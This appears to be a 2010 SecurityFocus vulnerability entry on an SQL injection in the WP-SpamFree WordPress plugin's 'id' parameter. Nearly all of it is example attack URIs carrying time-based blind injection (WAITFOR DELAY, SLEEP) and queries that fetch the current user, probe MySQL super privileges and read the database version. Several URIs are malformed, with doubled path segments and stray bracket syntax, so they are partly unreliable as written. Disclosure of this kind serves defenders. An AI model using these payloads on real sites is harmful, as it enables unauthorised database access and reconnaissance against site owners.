WordPress WP-SpamFree Plugin 'id' Parameter SQL Injection Vulnerability

Attacker can exploit this issue with a browser.

The following example URIs are available:

http://www.example.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php/id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5)

http://www.example.com/wp-content/wp-content/plugins/wp-spamfree/js/wpsf-js.php/[GET][id=-1][CURRENT_USER()

http://www.example.com/wp-content/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

http://www.example.com/wp-content/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6)


 

Privacy Statement
Copyright 2010, SecurityFocus